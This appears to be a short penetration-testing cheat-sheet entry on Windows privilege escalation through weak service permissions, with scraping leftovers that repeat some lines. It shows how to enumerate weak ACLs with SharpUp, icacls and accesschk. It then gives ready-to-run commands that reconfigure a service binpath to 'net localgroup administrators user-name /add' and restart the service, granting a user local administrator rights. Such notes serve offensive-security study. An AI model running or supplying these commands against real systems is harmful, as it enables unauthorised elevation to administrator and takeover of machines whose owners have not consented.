We can use SharpUp to check for service binaries suffering from weak ACLs.
SharpUp
To verify the ACLs for a specific file: icacls C:\path\to\file
icacls C:\path\to\file
Ideally, you need (I)(F), which means full permissions, e.g. BUILTIN\Users or Everyone:(I)(F)
(I)(F)
BUILTIN\Users
Everyone:(I)(F)
To check a service's permissions: accesschk.exe /accepteula -quvcw ServiceName
accesschk.exe /accepteula -quvcw ServiceName
If you have full permissions on a service, then you can add the current user to the administrators localgroup. To do so: [Requires CMD]
CMD
sc config ServiceName binpath="cmd /c net localgroup administrators user-name /add"
sc stop ServiceName
sc start ServiceName
Disclaimer: when starting the service you will get an error due to the previous sc config command
sc config
Last updated 10 months ago
